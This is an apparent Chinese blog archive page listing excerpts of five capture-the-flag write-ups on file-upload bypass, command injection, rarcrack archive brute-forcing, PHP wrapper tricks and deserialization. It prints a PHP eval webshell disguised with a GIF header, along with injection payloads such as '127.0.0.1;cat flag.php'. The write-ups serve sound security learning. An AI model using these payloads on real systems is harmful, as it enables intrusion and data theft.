月份:2020年4月

5 篇文章

[极客大挑战 2019]Upload
知识点 常用后缀 php,php3,php4,php5,phtml,pht 常用一句话 GIF89a? <script language="php">eval($_POST['laotun'])</script> 文件类型绕过 Content-type: image/jpeg 解题 .phtml上传成功 蚂剑连接 获取fla…
[GXYCTF2019]Ping Ping Ping 1
解题 打开题目,显示/?ip= 应该是传参 直接尝试?ip=127.0.0.1 果然是linux命令执行,尝试其他命令 ?ip=127.0.0.1;ls 成功执行 目标是打开flag.php ?ip=127.0.0.1;cat flag.php ?ip=127.0.0.1;cat index.php 回显/?ip= fxck your space!…
rarcrack暴力破解.rar
kali的rarcrack安装方法 直接使用代码,线上安装 sudo apt-get install rarcrack 安装libxml2-dev 包 sudo apt-get install libxml2-dev 操作 rarcrack 文件名 --threads 线程数 --type rar|zip|7z 如果你要修改rarcrack里面的字…
[ZJCTF 2019]NiZhuanSiWei 1
知识点 函数 isset() 函数 :检测变量是否设置 file_get_contents() 函数 :把整个文件读入一个字符串中 preg_match() 函数 :执行匹配正则表达式 data伪协议写入文件 data://text/plain filter读取源码 php://filter/read=convert.base64-encode/r…
[极客大挑战 2019]PHP1
解题过程 他说了备份,直接使用dirsearch扫目录 -u后面加网站 -e后面加语言 扫到www.zip压缩包 得到源文件: index.php包含如下代码: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> cla…